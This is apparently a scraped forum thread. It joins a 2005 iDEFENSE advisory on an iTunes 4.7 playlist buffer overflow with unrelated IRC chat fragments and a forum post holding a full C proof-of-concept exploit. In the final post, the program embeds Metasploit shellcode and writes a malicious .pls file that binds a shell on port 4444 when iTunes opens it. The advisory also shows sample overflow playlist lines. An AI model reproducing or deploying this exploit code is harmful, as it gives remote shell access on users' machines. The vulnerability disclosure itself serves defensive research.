Happy New Year! Yes, the current one, not a previous one; this is a new post, we swear!
0 Members and 3 Guests are viewing this topic.
Apple iTunes Playlist Parsing Buffer Overflow VulnerabilityiDEFENSE Security Advisory 01.13.05:http://www.idefense.com/application/poi/display?type=vulnerabilitiesJanuary 13, 2005I. BACKGROUNDApple iTunes is a digital jukebox capable of playing a variety of soundfile formats, sharing music and burning music CD's. More informationabout iTunes is available from: http://www.apple.com/itunes/II. DESCRIPTIONRemote exploitation of a buffer overflow vulnerability in Apple ComputerInc.'s iTunes music player allows attackers to execute arbitrary code.The problem specifically exists when parsing playlist files that containlong URL file entries. Malicious playlist files can come with either the.m3u or .pls extension. Though their formats are different, thevulnerability in each is the same.An example malicious .pls file with a long URL: [playlist] NumberOfEntries=1 File1=http://[A x 3045]1234An example malicious .m3u file with a long URL: http://[A x 3045]1234In both cases '[A x 3045]' represents any string of 3,045 bytes inlength. Opening either malicious playlist file on the Microsoft Windowsplatform will cause iTunes to crash with an access violation whenattempting to execute instruction 0x34333231, which is the little-endianASCII code representation of '1234'. An attacker can exploit thisvulnerability to redirect the flow of control and eventually executearbitrary code. While this example is specific to the Microsoft Windowsplatform, exploitation on the Apple Mac OS platform is also possible.III. ANALYSISExploitation of the described vulnerability allows remote attackers toexecute arbitrary code under the context of the user who started iTunes.Exploitation requires that an attacker convince a target user to open amalicious playlist file with a vulnerable version of iTunes.IV. DETECTIONiTunes 4.7 as installed on the Microsoft Windows and Apple Mac OSplatforms are affected. Earlier versions may also be susceptible.V. WORKAROUNDDo not open playlist files from untrusted sources. Inspect the contentsof .m3u and .pls playlist files for long URL file names prior to openingthem with iTunes.VI. VENDOR RESPONSEThis vulnerability is addressed in iTunes 4.7.1.iTunes 4.7.1 may be obtained from the Software Update pane in SystemPreferences, or Apple's iTunes download site: http://www.apple.com/itunes/download/VII. CVE INFORMATIONThe Common Vulnerabilities and Exposures (CVE) project has assigned thenames CAN-2005-0043 to these issues. This is a candidate for inclusionin the CVE list (http://cve.mitre.org), which standardizes names forsecurity problems.VIII. DISCLOSURE TIMELINE12/17/2004 Initial vendor notification12/17/2004 Initial vendor response01/13/2004 Public disclosureIX. CREDITSean de Regge (seanderegge[at]hotmail.com) is credited with thisdiscovery.Get paid for vulnerability researchhttp://www.idefense.com/poi/teams/vcp.jspX. LEGAL NOTICESCopyright (c) 2004 iDEFENSE, Inc.Permission is granted for the redistribution of this alertelectronically. It may not be edited in any way without the expresswritten consent of iDEFENSE. If you wish to reprint the whole or anypart of this alert in any other medium other than electronically, pleaseemail customerservice@idefense.com for permission.Disclaimer: The information in the advisory is believed to be accurateat the time of publishing based on currently available information. Useof the information constitutes acceptance for use in an AS IS condition.There are no warranties with regard to this information. Neither theauthor nor the publisher accepts any liability for any direct, indirect,or consequential loss or damage arising from use of, or reliance on,this information._______________________________________________Full-Disclosure - We believe in it.Charter: http://lists.netsys.com/full-disclosure-charter.html
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz[17:32:54] * xar sets mode: +o newby[17:32:58] <xar> new rule[17:33:02] <xar> me and newby rule all
Quote from: CrAz3D on June 30, 2008, 10:38:22 amI'd bet that you're currently bloated like a water ballon on a hot summer's day.That analogy doesn't even make sense. Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT.
I'd bet that you're currently bloated like a water ballon on a hot summer's day.
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min[20:21:15] xar: that was funny
Hey Everyone,I've written a proof of concept for the iTunes 4.7 advisory released by iDefense on January 13, 2005.Here is some code to exploit the vulnerability, it will generate a *.pls file which,when opened with iTunes 4.7 will bind a shell on port 4444.- nemo<------------------ fm-eyetewnz.c -------------------------->/* * PoC for iTunes on OS X 10.3.7 * -( nemo@felinemenace.org )- * * Generates a .pls file, when loaded in iTunes it * binds a shell to port 4444. * Shellcode contains no \x00 or \x0a's. * * sample output: * * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls * -( fm-eyetewnz )- * -( nemo@felinemenace.org )- * Creating file: foo.pls. * Bindshell on port: 4444 * -[nemo@gir:~]$ open foo.pls * -[nemo@gir:~]$ nc localhost 4444 * id * uid=501(nemo) gid=501(nemo) groups=501(nemo) * * Thanks to andrewg, mercy and core. * Greetings to pulltheplug and felinemenace. * * -( need a challenge? )- * -( http://pulltheplug.org )- */#include <stdio.h>#include <strings.h>#define BUFSIZE 1598 + 4char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa""\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee""\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a""\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba""\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9""\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9""\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7""\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93""\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91""\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83""\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13""\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83""\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83""\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04""\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83""\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3""\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0""\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3""\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";int main(int ac, char **av){ int n,*p; unsigned char * q; char buf[BUFSIZE]; FILE *pls; int offset=0x3DA8; char playlist[] = { "[playlist]\n" "NumberOfEntries=1\n" "File1=http://" }; printf("-( fm-eyetewnz )-\n"); printf("-( nemo@felinemenace.org )-\n"); memset(buf,'\x60',BUFSIZE); bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack. q = buf + sizeof(buf) - 5; p = (int *)q; if(!(av[1])) { printf("usage: %s <filename (.pls)> [offset]\n",*av); exit(1); } if(av[2]) offset = atoi(av[2]); *p = (0xc0000000 - offset);// 0xbfffc258; if(!(pls = fopen(*(av+1),"w+"))) { printf("error opening file: %s.\n", *(av +1)); exit(1); } printf("Creating file: %s.\n",*(av+1)); printf("Bindshell on port: 4444\n"); fwrite(playlist,sizeof(playlist) - 1,1,pls); fwrite(buf,sizeof(buf) - 1,1,pls); fclose(pls);}